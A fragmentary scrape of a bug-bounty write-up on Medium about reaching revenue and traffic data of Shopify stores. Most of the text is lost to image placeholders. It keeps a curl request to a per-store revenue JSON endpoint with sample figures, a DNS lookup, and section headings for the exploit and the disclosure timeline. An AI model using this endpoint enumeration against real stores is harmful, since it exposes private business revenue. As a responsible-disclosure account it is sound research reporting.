How I gained access to revenue and traffic data of thousands of Shopify stores

Ayoub FATHI
Apr 15, 2019 · 11 min read
Image for post
Image for post

Index

1. Introduction

Image for post
Image for post

2. Almost Vulnerable

(sample data)$ curl -s https://exchange.shopify.com/shops/$storeName/revenue_data.json{"2018–03–01":102.81,"2018–04–01":13246.83,"2018–05–01":29865.84,"2018–06–01":45482.13,"2018–07–01":39927.62,"2018–08–01":25864.51,"2018–09–01":14072.72,"2018–10–01":2072.16,"2018–11–01":13544.78,"2018–12–01":26824.54,"2019–01–01":31570.89,"2019–02–01":18336.71}
Image for post
Image for post
$ curl -I https://exchangemarketplace.com/shops/$newStore/revenue_data.jsonHTTP/2 404
server: nginx/1.15.9
date: Fri, 29 Mar 2019 20:28:18 GMT
content-type: application/json
vary: Accept-Encoding
vary: Accept-Encoding
x-request-id: 106906213c97052838ccaaaa54d8e438
Image for post
Image for post
/shops/$storeName/revenue_data.json

3. Getting da wordlist

; <<>> DiG 9.10.6 <<>> REDACTED.myshopify.com<...>REDACTED.myshopify.com. 3352 IN CNAME shops.myshopify.com.shops.myshopify.com. 1091 IN A 23.227.38.64
Image for post
Image for post

4. A Fail

/shops/$storeName/revenue_data.json
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

5. The new approach

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

6. The exploit

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

Impact

Image for post
Image for post
Image for post
Image for post

Analysis of root cause

7. Timeline

Image for post
Image for post
Image for post
Image for post

My own opinion on Shopify decision

8. Takeaway

Always read the policy carefully, reach out to the relevant team as soon as you have something even if you are not confident it is a vulnerability.

Image for post
Image for post

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Ayoub FATHI

Written by

Senior AppSec Engineer, Bug Bounty Hunter & I enjoy breaking things

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Ayoub FATHI

Written by

Senior AppSec Engineer, Bug Bounty Hunter & I enjoy breaking things

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store